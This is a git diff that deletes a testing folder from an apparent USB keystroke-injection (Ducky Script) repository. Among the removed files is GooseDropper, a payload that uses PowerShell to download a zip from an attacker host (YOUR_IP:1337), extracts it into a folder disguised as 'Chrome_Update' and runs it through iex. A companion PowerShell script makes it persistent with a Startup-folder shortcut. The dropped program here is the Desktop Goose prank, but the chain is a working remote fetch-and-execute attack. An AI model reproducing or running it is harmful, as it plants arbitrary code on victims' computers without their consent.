diff --git a/Duckyscripts/GooseDropper/testing/.gitignore b/Duckyscripts/GooseDropper/testing/.gitignore deleted file mode 100644 index e69de29..0000000 diff --git a/Duckyscripts/GooseDropper/testing/Desktop Goose v0.31.zip b/Duckyscripts/GooseDropper/testing/Desktop Goose v0.31.zip deleted file mode 100644 index 646ca9b..0000000 Binary files a/Duckyscripts/GooseDropper/testing/Desktop Goose v0.31.zip and /dev/null differ diff --git a/Duckyscripts/GooseDropper/testing/GooseDropper.txt.bk b/Duckyscripts/GooseDropper/testing/GooseDropper.txt.bk deleted file mode 100644 index 13392f9..0000000 --- a/Duckyscripts/GooseDropper/testing/GooseDropper.txt.bk +++ /dev/null @@ -1,23 +0,0 @@ -REM TITLE GooseDropper -REM AUTHOR Fr3ki -REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and run it on the victim PC -DELAY 500 -GUI r -DELAY 500 -STRING powershell wget YOUR_IP:1337 -OutFile $ENV:Temp/Updater.zip -ENTER -DELAY 8000 -GUI r -DELAY 500 -STRING powershell Expand-Archive $ENV:Temp\Updater.zip -DestinationPath $ENV:Temp\Chrome_Update -ENTER -DELAY 3000 -GUI r -DELAY 500 -STRING powershell gc $env:Temp\Chrome_Update\Update\PersistentGoose.ps1 | iex -ENTER -DELAY 1000 -GUI r -DELAY 500 -STRING %Temp%\Chrome_Update\Update\GooseDesktop.exe -ENTER diff --git a/Duckyscripts/GooseDropper/testing/PersistentGoose.ps1.bk b/Duckyscripts/GooseDropper/testing/PersistentGoose.ps1.bk deleted file mode 100644 index 94e731b..0000000 --- a/Duckyscripts/GooseDropper/testing/PersistentGoose.ps1.bk +++ /dev/null @@ -1,6 +0,0 @@ -$WScriptShell = New-Object -ComObject WScript.Shell -$TargetFile = "$env:Temp\Chrome_Update\Update\GooseDesktop.exe" -$ShortcutFile = "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HONK.lnk" -$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile) -$Shortcut.TargetPath = $TargetFile -$Shortcut.Save() \ No newline at end of file diff --git a/Duckyscripts/GooseDropper/testing/bk_Desktop Goose v0.31.zip b/Duckyscripts/GooseDropper/testing/bk_Desktop Goose v0.31.zip deleted file mode 100644 index 646ca9b..0000000 Binary files a/Duckyscripts/GooseDropper/testing/bk_Desktop Goose v0.31.zip and /dev/null differ diff --git a/Duckyscripts/GooseDropper/testing/recover.sh b/Duckyscripts/GooseDropper/testing/recover.sh deleted file mode 100644 index 3cc35ef..0000000 --- a/Duckyscripts/GooseDropper/testing/recover.sh +++ /dev/null @@ -1,6 +0,0 @@ -#!/bin/bash - -cp PersistentGoose.ps1.bk PersistentGoose.ps1 -cp "bk_Desktop Goose v0.31.zip" "Desktop Goose v0.31.zip" -cp GooseDropper.txt.bk GooseDropper.txt -rm Chrome_Update.zip